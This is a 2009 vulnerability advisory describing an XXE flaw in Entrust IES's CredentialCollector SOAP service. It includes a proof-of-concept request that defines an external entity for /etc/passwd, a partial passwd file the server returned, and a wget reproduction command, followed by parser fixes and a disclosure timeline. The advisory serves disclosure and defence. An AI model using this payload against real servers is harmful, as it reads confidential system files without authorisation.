Entrust IES Vulnerable to XXE Attacks ===================================== Sverre H. Huseby 2009-06-15 Micro summary: Using specially crafted SOAP requests, it is possible to make IES return the contents of (some) server-local files. The Identification and Entitlements Server (IES) from Entrust appears to be vulnerable to XML External Entitity (XXE) attacks. This kind of attack was first described by Gregory Steuck in a post to Bugtraq in 2002: http://www.securityfocus.com/archive/1/297714 For another XXE Attack example, see my report of a similar bug in Adobe Reader in 2005: http://shh.thathost.com/secadv/adobexxe/ Note: This attack has only been tested with the CredentialCollector service. It may be present in other parts of IES as well, and even in other Entrust products relying on incoming XML messages (e.g. SOAP-based services). In order to provide programmatic login based on username and password, the CredentialCollector accepts incoming SOAP messages that look like this: JoeBossman Apple1995 saml:Assertion ReqIssue If the incoming username refers to a non-existing user, the response will include the following tag: Unknown user - JoeBossman You may notice that the ns1:Username from the request has been echoed back in the response. Let's try passing a request in which the username is not plain text, but rather an entity that refers to a local file on the computer. We modify the above request to look like this: ]> &xxe; Apple1995 saml:Assertion ReqIssue Note the addition of a DOCTYPE defining the entity "xxe" as a reference to the file /etc/passwd, and the ns1:Username tag that now contains a reference to the new entity. When we pass this request to the server, we get a reply that contains the following: Unknown user - root:x:0:0:Super-User-ast-win06:/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico smmsp:x:25:25:SendMail Message Submission Program:/: listen:x:37:4:Network Admin:/usr/net/nls: gdm:x:50:50:GDM Reserved UID:/: webservd:x:80:80:WebServer Reserved UID:/: postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh svctag:x:95:12:Service Tag UID:/: nobody:x:60001:60001:NFS Anonymous Access User:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/: entrust:x:4000:4000:Telenor WIN user:/home/entrust:/usr/bin/bash (A lot of lines have been removed from the output for obvious reasons.) You will probably recognize the output as a typical Solaris /etc/passwd file. Note: The attack is limited to files containing text that the XML parser will allow at the place the External Entity is referenced. Files containing non-printable characters, and files with randomly located less than signs or ampersands, will not be includable. Steps to Reproduce ------------------ * Save the above XML in a file named xxe.xml * Edit the file so that the first line has no leading whitespace. * Use wget to post the contents of the file to a GetAccess server with IES support (replace HOSTNAME with the correct name): wget -S -O- --post-file=xxe.xml \ http://HOSTNAME:50002/ies/CredentialCollector Solution -------- Entrust should make sure the XML parser will not follow URIs to External Entities, or make it follow known good URIs (white listed URIs) only. With some parsers one may install a custom made entity resolver and have it control the inclusion of the URI. With other parsers one can instead just say setExpandEntityReferences(false), but note that this setting may be ignored by some of the parsers. Testing will be needed. Notification Tracking --------------------- 2009-06-15: Entrust notified. 2010-02-10: Patch available: https://secure.entrust.com/trustedcare/troubleshooting/e10-004.pdf